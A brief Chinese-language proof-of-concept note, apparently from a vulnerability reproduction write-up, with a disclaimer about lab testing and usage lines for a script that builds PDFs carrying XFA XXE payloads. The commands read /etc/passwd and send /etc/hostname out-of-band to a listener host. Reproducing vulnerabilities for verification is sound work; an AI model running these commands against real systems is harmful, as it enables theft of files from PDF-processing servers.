免责声明:我不是此漏洞的原始发现者。本文记录了我为教育目的在受控环境中复现该问题的过程,并帮助其他人验证自己的系统。 测试在隔离的实验环境中进行,对生产系统无任何影响。
用法:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
